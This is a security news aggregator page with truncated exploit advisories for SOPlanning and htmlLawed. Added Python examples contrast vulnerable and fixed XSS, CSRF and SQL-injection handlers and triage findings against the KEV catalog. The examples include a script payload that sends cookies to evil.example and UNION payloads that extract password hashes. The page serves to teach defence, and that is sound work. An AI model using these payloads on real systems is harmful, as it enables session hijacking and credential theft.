NSC’s Neuberger on mitigating cyberattacks: ‘We should be using an operational approach’
The Cyber Post
by The Cyber Post
6h ago
Just five months after President Joe Biden tapped Anne Neuberger to be his deputy national security adviser for cyber and emerging technologies, the Colonial Pipeline ransomware attack took the country’s largest fuel pipeline offline for six days. It was something of a wakeup call: Across the country, gas prices spiked, fuel supplies plummeted, and there were gas lines up and down the Eastern Seaboard. Neuberger, who was a top official at the National Security Agency for more than a decade before moving to the White House, has spent the last three years looking for ways not just to preve ..read more
SOPlanning 1.52.00 Cross Site Scripting
The Cyber Post
21h ago
Authored by liquidsky. SOPlanning version 1.52.00 suffers from a cross site scripting vulnerability in groupe_save.php.
Exploit Title: SOPlanning v1.52.00 'groupe_save.php' XSS (Reflected XSS)
Application: SOPlanning
Version: 1.52.00
Date: 4/22/24
Exploit Author: Joseph McPeters (Liquidsky)
Vendor Homepage: https://www.soplanning.org/en/
Software Link: https://sourceforge.net/projects/soplanning/
Tested on: Linux
CVE: Not yet assigned
Description: SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameter; a remote unauthenticated attacker can hijack the admin account ..read more
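The advisory above only names the bug class and the reflected parameter. The following is an added illustration, not code from SOPlanning or from the advisory author: a hypothetical handler that echoes a groupe_id query parameter into its response unescaped, beside the same handler with HTML output encoding, and a minimal stand-in for the browser that counts the script elements it would execute. The host names, the payload and the page markup are constructed; only the parameter name is taken from the advisory.

```python
"""Reflected XSS: a query parameter echoed into HTML unescaped, beside the
encoded version. Added illustration, not code from SOPlanning; the handler,
page and URLs are hypothetical, only the parameter name is from the advisory."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlsplit

# Constructed payload: posts the victim's cookies to an attacker-controlled host.
PAYLOAD = "<script>fetch('https://evil.example/',{method:'POST',body:document.cookie})</script>"
# The attacker sends the victim this link; the payload rides in the reflected parameter.
ATTACK_URL = "https://planning.example/groupe_save.php?groupe_id=" + quote(PAYLOAD, safe="")


def _param(url, name):
    """Server-side view of one query parameter after URL decoding."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(url):
    """Echoes the parameter verbatim: attacker markup becomes page markup."""
    return f"<p>Saved group <b>{_param(url, 'groupe_id')}</b></p>"


def render_fixed(url):
    """Encodes for the HTML text context, so a '<' in input can never open a tag."""
    safe = html.escape(_param(url, "groupe_id"), quote=True)
    return f"<p>Saved group <b>{safe}</b></p>"


class _ScriptCounter(HTMLParser):
    """Minimal stand-in for the browser: counts <script> elements it would run."""

    def __init__(self):
        super().__init__()
        self.count = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.count += 1


def script_tags(page):
    """Number of script elements a browser would execute in the rendered page."""
    parser = _ScriptCounter()
    parser.feed(page)
    return parser.count


if __name__ == "__main__":
    print("vulnerable:", script_tags(render_vulnerable(ATTACK_URL)), "script tag(s)")
    print("fixed:     ", script_tags(render_fixed(ATTACK_URL)), "script tag(s)")
```

Output encoding is the fix for the reflection itself. Marking the session cookie HttpOnly blocks the cookie theft shown in the constructed payload, but it does not stop an injected script from driving the application with the victim's session from inside the page, so it is defence in depth, not a substitute.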
SOPlanning 1.52.00 Cross Site Request Forgery
The Cyber Post
21h ago
Authored by liquidsky. SOPlanning version 1.52.00 suffers from a cross site request forgery vulnerability in xajax_server.php.
<!--
Exploit Title: SOPlanning v1.52.00 'xajax_server.php' CSRF (Account Takeover)
Application: SOPlanning
Version: 1.52.00
Date: 4/22/24
Exploit Author: Joseph McPeters (Liquidsky)
Vendor Homepage: https://www.soplanning.org/en/
Software Link: https://sourceforge.net/projects/soplanning/
Tested on: Linux
CVE: Not yet assigned
Description: SOPlanning v1.52.00 is vulnerable to CSRF via 'xajax_server.php'; a remote unauthenticated attacker can hijack the a ..read more
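The advisory describes account takeover through a forged cross-site request. As an added illustration, not SOPlanning's xajax_server.php or the advisory author's code, the block below models a state-changing endpoint that accepts the session cookie as its only authenticator, beside one that also requires a per-session synchronizer token and a same-origin Origin header. The session store, endpoint, host names and request shapes are hypothetical.

```python
"""CSRF: a password-change endpoint that trusts the session cookie alone, versus
one that also checks a per-session token and the Origin header.
Added illustration, not SOPlanning code; all names and state here are constructed."""
import hmac
import secrets

SITE_ORIGIN = "https://planning.example"

# Constructed server-side state: session id -> session record, and the user table.
SESSIONS = {"s3ss10n": {"user": "admin", "csrf_token": secrets.token_urlsafe(32)}}
USERS = {"admin": {"password": "original"}}


def _session(req):
    """Look the session up by the cookie the browser attached to the request."""
    return SESSIONS.get(req.get("cookies", {}).get("sid"))


def change_password_vulnerable(req):
    """The cookie is the only authenticator, so a cross-site form POST succeeds."""
    sess = _session(req)
    if sess is None:
        return 401
    USERS[sess["user"]]["password"] = req["form"]["new_password"]
    return 200


def change_password_fixed(req):
    """Same endpoint with two independent CSRF checks."""
    sess = _session(req)
    if sess is None:
        return 401
    # 1. Browsers send Origin on cross-site POSTs; anything but our own origin is rejected,
    #    and a missing header is treated as hostile rather than as a free pass.
    if req.get("headers", {}).get("Origin") != SITE_ORIGIN:
        return 403
    # 2. Synchronizer token: the attacker's page cannot read it because of the
    #    same-origin policy, so it cannot put the right value in the forged form.
    supplied = req["form"].get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, sess["csrf_token"].encode()):
        return 403
    USERS[sess["user"]]["password"] = req["form"]["new_password"]
    return 200


def forged_request():
    """What the victim's browser sends when an attacker page auto-submits a form:
    the session cookie rides along, the token and a same-site Origin do not."""
    return {"cookies": {"sid": "s3ss10n"},
            "headers": {"Origin": "https://evil.example"},
            "form": {"new_password": "attacker-chosen"}}


def legitimate_request():
    """A submission from the application's own page, which embeds the token."""
    return {"cookies": {"sid": "s3ss10n"},
            "headers": {"Origin": SITE_ORIGIN},
            "form": {"new_password": "user-chosen",
                     "csrf_token": SESSIONS["s3ss10n"]["csrf_token"]}}


if __name__ == "__main__":
    print("vulnerable endpoint, forged request:", change_password_vulnerable(forged_request()))
    print("fixed endpoint, forged request:     ", change_password_fixed(forged_request()))
    print("fixed endpoint, legitimate request: ", change_password_fixed(legitimate_request()))
```

The Origin check alone is enough for browser-originated requests from modern clients, and the token alone is enough wherever the header is stripped by a proxy; keeping both means one misconfiguration does not reopen the hole. Setting SameSite=Lax or Strict on the session cookie is a further, client-enforced layer on top of these server-side checks.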
SOPlanning 1.52.00 SQL Injection
The Cyber Post
21h ago
Authored by liquidsky. SOPlanning version 1.52.00 suffers from a remote SQL injection vulnerability in projects.php.
Exploit Title: SOPlanning v1.52.00 'projets.php' SQLi
Application: SOPlanning
Version: 1.52.00
Date: 4/22/24
Exploit Author: Joseph McPeters (Liquidsky)
Vendor Homepage: https://www.soplanning.org/en/
Software Link: https://sourceforge.net/projects/soplanning/
Tested on: Linux
CVE: Not yet assigned
Description: SOPlanning v1.52.00 is vulnerable to Authenticated SQL Injection via the 'projects.php' page.
Instructions: Authenticate to the host, the credentials can be ..read more
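The advisory stops at naming the injectable page. The block below is an added, self-contained illustration of the bug class rather than SOPlanning's own query or the advisory's payload: a lookup built by string concatenation beside the parameterised form, run against an in-memory SQLite database with constructed tables, so the UNION-based extraction of credentials from a second table can be seen succeeding against one and failing against the other. Table and column names and the stored hash are constructed.

```python
"""Authenticated SQL injection: concatenated query versus bound parameter.
Added illustration using constructed SQLite tables, not SOPlanning's schema or code."""
import sqlite3


def make_db():
    """Constructed data: a projects table the page is meant to read, and a users
    table it is not, holding a placeholder hash string."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE projects(id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users(login TEXT, password_hash TEXT);
        INSERT INTO projects VALUES (1, 'alpha'), (2, 'beta');
        INSERT INTO users VALUES ('admin', 'constructed-hash-value');
    """)
    return con


def project_names_vulnerable(con, project_id):
    """Attacker-controlled text is spliced into the SQL, so it can change the
    statement's structure, not just the compared value."""
    sql = "SELECT name FROM projects WHERE id = '" + project_id + "'"
    return [row[0] for row in con.execute(sql)]


def project_names_fixed(con, project_id):
    """The value travels as a bound parameter; the statement structure is fixed
    before the input is seen, so quotes and keywords in it are inert."""
    sql = "SELECT name FROM projects WHERE id = ?"
    return [row[0] for row in con.execute(sql, (project_id,))]


# Constructed payloads for the single-quoted integer context above.
TAUTOLOGY = "1' OR '1'='1"                      # returns every project
UNION_DUMP = "0' UNION SELECT login || ':' || password_hash FROM users--"  # reads another table


if __name__ == "__main__":
    for label, fn in (("vulnerable", project_names_vulnerable), ("fixed", project_names_fixed)):
        db = make_db()
        print(label, "normal:   ", fn(db, "1"))
        print(label, "tautology:", fn(db, TAUTOLOGY))
        print(label, "union:    ", fn(db, UNION_DUMP))
```

The trailing `--` in the UNION payload comments out the closing quote the application appends; the `0'` in front closes the original literal with an id that matches no row, so the only output is the attacker's SELECT. With the bound parameter the same strings are compared, as a whole, against the id column and match nothing. Parameterisation fixes the query; it does not make the page's authorisation correct, which is why an authenticated-only injection still matters when any low-privilege account can reach it.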
Organizations patch CISA KEV list bugs 3.5 times faster than others, researchers find
The Cyber Post
1d ago
Researchers have found that a catalog of exploited vulnerabilities maintained by the federal government is having a tangibly positive effect on organizations both within and outside of the federal government. The Cybersecurity and Infrastructure Security Agency (CISA) has run its Known Exploited Vulnerabilities (KEV) catalog for nearly three years, and it has quickly become the go-to repository for software and hardware bugs actively being exploited by hackers around the world. Experts at cybersecurity scanning company Bitsight posed the question, “do organizations remediate KE ..read more
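The practical value of the KEV catalog is that it ships as a machine-readable JSON feed with a remediation due date per entry, which lets a team rank findings by "known exploited and overdue" rather than by CVSS alone. The block below is an added example of that triage, not Bitsight's methodology or any CISA tooling. The catalog excerpt is constructed in the shape of CISA's known_exploited_vulnerabilities.json (same field names); its dates, descriptions and the placeholder CVE IDs are sample data, not statements about those vulnerabilities, and the inventory is a constructed scanner export.

```python
"""Rank an asset inventory against the CISA KEV catalog by remediation due date.
Added example; the catalog excerpt and inventory below are constructed sample data."""
import json
from datetime import date

# Constructed excerpt with the field layout of known_exploited_vulnerabilities.json.
KEV_JSON = """{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "catalogVersion": "2024.05.03",
  "dateReleased": "2024-05-03T14:00:00.0000Z",
  "count": 2,
  "vulnerabilities": [
    {"cveID": "CVE-2022-35914", "vendorProject": "Teclib", "product": "GLPI",
     "vulnerabilityName": "constructed entry", "dateAdded": "2023-03-07",
     "shortDescription": "constructed entry",
     "requiredAction": "Apply updates per vendor instructions.",
     "dueDate": "2023-03-28", "knownRansomwareCampaignUse": "Unknown", "notes": ""},
    {"cveID": "CVE-2023-99999", "vendorProject": "Example", "product": "Gateway",
     "vulnerabilityName": "placeholder entry", "dateAdded": "2024-04-29",
     "shortDescription": "constructed entry",
     "requiredAction": "Apply updates per vendor instructions.",
     "dueDate": "2024-05-20", "knownRansomwareCampaignUse": "Known", "notes": ""}
  ]
}"""

# Constructed scanner output: one finding per (host, CVE).
INVENTORY = [
    {"host": "db-01", "cve": "CVE-2023-11111"},
    {"host": "vpn-01", "cve": "CVE-2023-99999"},
    {"host": "web-01", "cve": "CVE-2022-35914"},
]


def load_kev(text):
    """Index the catalog by CVE ID for O(1) lookups."""
    return {v["cveID"]: v for v in json.loads(text)["vulnerabilities"]}


def triage(kev, inventory, today):
    """Annotate each finding with KEV membership, days to the due date and
    ransomware use, then order: overdue first, then soonest due, then non-KEV."""
    rows = []
    for finding in inventory:
        entry = kev.get(finding["cve"])
        if entry is None:
            rows.append({**finding, "in_kev": False, "status": "not in KEV",
                         "days_to_due": None, "ransomware": None})
            continue
        days = (date.fromisoformat(entry["dueDate"]) - today).days
        rows.append({**finding, "in_kev": True,
                     "status": "overdue" if days < 0 else "due",
                     "days_to_due": days,
                     "ransomware": entry["knownRansomwareCampaignUse"]})
    # Negative days (overdue) sort ahead of positive; non-KEV findings go last.
    rows.sort(key=lambda r: (not r["in_kev"],
                             r["days_to_due"] if r["days_to_due"] is not None else float("inf")))
    return rows


if __name__ == "__main__":
    for r in triage(load_kev(KEV_JSON), INVENTORY, date(2024, 5, 3)):
        print(f"{r['host']:8} {r['cve']:15} {r['status']:11} "
              f"days_to_due={r['days_to_due']} ransomware={r['ransomware']}")
```

Two caveats when running this against the real feed: match on the exact cveID string, since scanner exports sometimes carry lowercase or whitespace-padded IDs, and treat "not in KEV" as "no evidence of exploitation in the catalog", not as "safe"; the catalog is a floor for prioritisation, not a ceiling.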
Ukraine records increase in financially motivated attacks by Russian hackers
The Cyber Post
1d ago
Ukraine’s government is reporting an increase in financially motivated cyberattacks conducted by previously unidentified hackers associated with Russia. According to a recent report, these groups became more active in Ukrainian networks in the latter half of 2023, causing a shift in the ongoing cyberwar previously dominated by well-known Kremlin-supported hacker groups like Sandworm and Armageddon. “The emergence of new actors suggests a deliberate strategy by Russia to diversify its cyberwarfare arsenal,” said Yevheniia Volivnyk, chief of Ukraine’s computer emergency response team ..read more
NATO and EU condemn ‘intensifying’ Russian sabotage and hybrid operations
The Cyber Post
1d ago
In recent weeks NATO allies and European Union member states have made a series of allegations about Russian hybrid operations targeting their countries, prompting both the alliance and the bloc to formally condemn the Kremlin’s conduct. The North Atlantic Council, NATO’s political executive, announced on Thursday that allies were “deeply concerned about recent malign activities on Allied territory, including those resulting in the investigation and charging of multiple individuals in connection with hostile state activity.” A range of activities have come to light following counterintelligen ..read more
HtmlLawed 1.2.5 Remote Command Execution
The Cyber Post
2d ago
Authored by d4t4s3c. Proof of concept remote command execution exploit for htmlLawed versions 1.2.5 and below.
Advisories: CVE-2022-35914
#!/bin/bash
# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution
# Date: 2024-05-02
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
# Software Link: https://github.com/kesar/HTMLawed
# Version: <= 1.2.5
# Tested on: Linux
# Category: Web Application
# CVE: CVE-2022-35914
while getopts ":u:c:" arg; do
  case ${arg} in
    u) url=${OPTARG}; let paramet ..read more
How to Make Your Employees Your First Line of Cyber Defense
The Cyber Post
2d ago
May 01, 2024The Hacker NewsSecurity Awareness Training There’s a natural human desire to avoid threatening scenarios. The irony, of course, is if you hope to attain any semblance of security, you’ve got to remain prepared to confront those very same threats. As a decision-maker for your organization, you know this well. But no matter how many experts or trusted cybersecurity tools your organization has a standing guard, you’re only as secure as your weakest link. There’s still one group that can inadvertently open the gates to unwanted threat actors—your own people. Security must be seco ..read more
Ukrainian REvil Hacker Sentenced to 13 Years and Ordered to Pay $16 Million
The Cyber Post
2d ago
May 02, 2024NewsroomRansomware / Cyber Crime A Ukrainian national has been sentenced to more than 13 years in prison and ordered to pay $16 million in restitution for carrying out thousands of ransomware attacks and extorting victims. Yaroslav Vasinskyi (aka Rabotnik), 24, along with his co-conspirators part of the REvil ransomware group orchestrated more than 2,500 ransomware attacks and demanded ransom payments in cryptocurrency totaling more than $700 million. “The co-conspirators demanded ransom payments in cryptocurrency and used cryptocurrency exchangers and mixing services to hide ..read more